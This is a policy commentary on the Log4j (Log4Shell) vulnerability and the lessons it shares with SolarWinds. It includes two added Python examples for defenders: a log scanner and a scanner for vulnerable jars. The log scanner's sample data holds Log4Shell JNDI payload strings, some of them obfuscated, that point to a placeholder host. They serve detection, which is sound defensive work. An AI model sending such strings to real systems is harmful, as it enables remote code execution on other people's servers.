Will The Log4j Exploit Move Leaders To Heed Cybersecurity Warnings?

Published on December 14th, 2021





A year after the SolarWinds compromise set the security world on fire, we are faced with another potentially devastating cyber incident. The Log4j vulnerability (CVE-2021-44228, widely known as Log4Shell) is the latest flaw with the potential to cause significant economic and national security harm. Although SolarWinds and Log4j are very different incidents at the technical level, both carry key lessons, and warnings, for organizational leaders, meaning entire C-suites rather than just Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs), and for policymakers.

First, it is important to understand why this most recent incident is so consequential. Log4j is a Java logging library maintained by the Apache Software Foundation. That means it is collaboratively developed, publicly accessible software (open source) that is very commonly used to collect and store records (logging) of activity on a server, such as one running a website. Those logs are kept for many purposes, including monitoring the performance of the system and, ironically, examining the security implications of potentially anomalous events. Ideally, logging is passive: the library writes the records down for later analysis, and that is it. The newly discovered vulnerability breaks that assumption. When an affected version of Log4j logs a string containing a specially formed lookup expression, it does not simply record the text; it resolves the expression, reaching out over JNDI (typically LDAP or RMI) to a server of the attacker's choosing and loading whatever that server returns, which yields remote code execution on the machine doing the logging. Thus, many of the reported incidents are the result of attackers finding new places to plant such strings so that they end up in a log: HTTP headers such as User-Agent, usernames, search queries, or any other field an application records.

Numerous examples have already been reported of seemingly benign items like chat messages carrying those malicious strings. That exposure alone demonstrates the breadth of this vulnerability, and the proof-of-concept exploits made public add to it. Anyone can reuse those exploits for their own purposes, such as installing cryptocurrency miners on compromised servers, and reports of compromised systems are proliferating rapidly. Because Log4j is so widespread, it is inevitable that those compromises will continue to grow for weeks or months, and will include systems that are only indirectly exposed because a service provider or a vendor product uses Log4j internally.
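To make the mechanism concrete, here is an added example (not code from this article or from the Log4j project) of the triage check a security operations team would run over its own web-server logs. It looks for the lookup strings described above in attacker-controlled fields such as the User-Agent header, after undoing the URL encoding and the nested-lookup obfuscation (`${lower:j}`, `${::-j}`) that attackers use to slip past naive matching on the literal text `${jndi:`. The log lines are constructed for the example and use documentation IP ranges.

```python
"""Triage web-server logs for Log4Shell lookup strings.

Added example (not code from the article or from the Log4j project).  The
point it demonstrates: the attack string only has to reach something the
application logs, and naive matching on the literal text "${jndi:" misses
the URL-encoded and nested-lookup variants seen in real exploit traffic.
"""
import re
import urllib.parse
from typing import List, Tuple

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
# Line 3 is URL-encoded; lines 4 and 5 use Log4j's own lookup syntax to hide the word "jndi".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login?user=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9/b}"
203.0.113.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/c}"
198.51.100.7 - - [10/Dec/2021:14:03:00 +0000] "GET /price?item=${total} HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Innermost lookups only (no braces inside), so repeated substitution unwraps nesting.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                      # ${::-j}   -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_CALLBACK = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)://([^/\s}]+)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL encoding and the lookup-based obfuscation attackers wrap around 'jndi'."""
    for _ in range(3):  # attackers sometimes double-encode; stop once decoding is stable
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        stripped = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        stripped = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), stripped)
        if stripped == text:
            return text
        text = stripped


def scan_line(line: str) -> Tuple[bool, str, str]:
    """Return (flagged, scheme, callback host) for one log line."""
    norm = normalize(line)
    m = _CALLBACK.search(norm)
    if m:
        return True, m.group(1).lower(), m.group(2)
    if _JNDI.search(norm):  # lookup present but callback target not parseable
        return True, "", ""
    return False, "", ""


def scan_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for num, line in enumerate(text.splitlines(), 1):
        flagged, scheme, host = scan_line(line)
        if flagged:
            hits.append((num, scheme, host))
    return hits


if __name__ == "__main__":
    for num, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {num}: JNDI lookup via {scheme or '?'} to {host or '?'}")
```

Run as a script it lists lines 2 through 5 with the callback scheme and host; the legitimate `${total}` on line 6 is not flagged. The normalization is deliberately limited to the lookups seen in exploit traffic (Log4j supports others, such as `env`, `sys` and `date`), so treat a miss as "no evidence" rather than "clean", and treat a hit as an attempt rather than a confirmed compromise: whether the server actually connected to the callback host is a question for the outbound-connection logs.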

In contrast, SolarWinds was a complex supply chain intrusion: the attackers compromised the vendor's build process and inserted a backdoor into a packaged commercial software product, the Orion platform, which was then distributed to customers as a legitimate signed update. Although many organizations received the tainted update, the intrusion was the work of sophisticated adversaries targeting a very specific weak point, and the resulting access was used selectively against high-profile government and corporate networks.

Although very different in technical detail, these incidents reveal several critical points in common. First and foremost, leaders can never be complacent about cyber threats. It is, almost literally, not possible to do enough to be completely and provably secure in the modern, complex, and connected world. All leaders, not just CIOs and CISOs, need to be constantly vigilant, think about the risks their organizations face, and be prepared to respond rapidly if (when) the worst happens. Without that preparedness, they leave their organizations exposed to terrible consequences. It is also up to those leaders to weigh the cost of this vigilance and find ways to invest appropriately.

Second, organizations need to be rigorous and proactive in adopting the basics of good cybersecurity hygiene. The core items that cybersecurity experts have highlighted for years, such as scanning your network for known vulnerabilities and fixing them expeditiously, managing access to sensitive data, and keeping backups for recovery, are not a silver bullet, but they will certainly reduce the risk of an intrusion or limit its effect, and make your recovery as smooth as possible. In this most recent incident, for example, a patched release of Log4j was available by the time the vulnerability became widely known. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and others are actively urging organizations to upgrade to the latest patched version as a critical response step. That step is necessary but not sufficient. First, you have to know where Log4j is: it is a library, not an application, so it sits embedded inside other software, including commercial products whose vendors may not yet have said whether they are affected. Second, if you have already been compromised, the nature of this exploit means you must look deeper at your systems to confirm that the intruders have not established persistence or spread beyond the initial foothold.
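Knowing where Log4j is starts with inventory. The following is an added example, not the article's or the Log4j project's code, of a host-side check for vulnerable copies of log4j-core: it walks a directory tree, opens every jar, war or ear it finds, descends into archives nested inside them (the usual way a vendor application bundles its own copy), and reports each archive that still contains the JndiLookup class at a version below a threshold. The threshold is a parameter because later Log4j releases raised the bar beyond 2.15.0. The sample tree it scans is constructed in a temporary directory from placeholder entries rather than real jars.

```python
"""Locate log4j-core copies on a host, including ones nested inside war/ear files.

Added example (not the article's or the Log4j project's code).  An archive is
reported when it still contains the JndiLookup class and its recorded version
is below FIXED_VERSION; the sample tree below is constructed, not real jars.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import List, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
# 2.15.0 was the first release addressing CVE-2021-44228; later releases raised
# the bar further, so this is a parameter to revise, not a fixed truth.
FIXED_VERSION = (2, 15, 0)

Finding = Tuple[str, str, bool]  # (archive path, version string, vulnerable?)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '2.15.0-rc1'."""
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])


def inspect_archive(zf: zipfile.ZipFile, path: str) -> List[Finding]:
    """Check one open archive, then recurse into any archives nested in it."""
    findings: List[Finding] = []
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        version = "unknown"
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            if m:
                version = m.group(1).strip()
        # Missing version metadata counts as vulnerable: prove it fixed, do not assume.
        vulnerable = version == "unknown" or parse_version(version) < FIXED_VERSION
        findings.append((path, version, vulnerable))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXTS):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(inner, f"{path}!{name}"))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory and inspect every archive found in it."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXTS):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    findings.extend(inspect_archive(zf, full))
            except zipfile.BadZipFile:
                continue
    return findings


def fake_core_jar(version: str) -> bytes:
    """Constructed stand-in for log4j-core holding only the entries the scanner keys on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
    return buf.getvalue()


def build_fixture(root: str) -> None:
    """Constructed sample tree: two loose jars, a vendor war bundling its own copy,
    and a Log4j 1.x jar (no JndiLookup class, so this check does not flag it)."""
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(fake_core_jar("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.15.0.jar"), "wb") as f:
        f.write(fake_core_jar("2.15.0"))
    with zipfile.ZipFile(os.path.join(root, "vendor-app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_core_jar("2.14.1"))
        war.writestr("WEB-INF/web.xml", "<web-app/>")
    with zipfile.ZipFile(os.path.join(root, "log4j-1.2.17.jar"), "w") as old:
        old.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe")


def demo() -> List[Finding]:
    """Scan the constructed fixture; paths are returned relative to the fixture root."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return sorted((os.path.relpath(p, root), v, vuln) for p, v, vuln in scan_tree(root))


if __name__ == "__main__":
    for path, ver, vuln in demo():
        print(f"{'VULNERABLE' if vuln else 'ok        '} {ver:>8}  {path}")
```

Two design points matter here. Keying on the presence of `JndiLookup.class` rather than on the jar's file name catches renamed or repackaged copies, and it also reflects the documented stopgap of deleting that class from the jar, which this check correctly reports as not vulnerable. Log4j 1.x jars have no such class and are not flagged; they are out of scope for this vulnerability but are long past end of life and deserve their own attention.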

Third, as organizations move beyond cyber hygiene basics, they should apply the principles of zero trust, which the U.S. government has been advocating to improve its own cybersecurity posture in response to the SolarWinds incident. Although the leap to a true zero-trust architecture is complex and time consuming, it forces organizations to think carefully about their most sensitive data and how access to it can and should be controlled. Proper segmentation of those data can minimize the organizational cost of an intrusion, and detailed monitoring of activity, especially around those critical assets, can help quickly identify when an intrusion has taken place and possibly limit its scope. In the Log4j case, those same controls are what stand between a compromised logging server and the rest of the network: an outbound-connection policy that stops the server from reaching arbitrary LDAP or RMI endpoints on the internet breaks the exploit's download step, and alerting on such outbound attempts reveals which systems are being probed.

Finally, Log4j is yet another example of why the U.S. Congress must prioritize enhanced cybersecurity in 2022. The important hearings and discussions on this issue in 2021 highlighted the scope of the challenges and underscored that lawmakers will hold accountable executives who fail to take cyber issues seriously. At the same time, they also demonstrated that the challenges continue to evolve dramatically. Congress's initial investments in state and local cybersecurity in the Infrastructure Investment and Jobs Act must be accompanied by comparable investments elsewhere, along with clear and consistent direction on the importance of public-private cooperation in critical matters such as threat sharing and incident reporting. As has been widely noted, this is a team sport, but we are struggling even to stay on the field today.

Looking ahead, it is critical that industry and government partners collectively recommit to the investments necessary to keep pace with these dynamic and evolving threats.

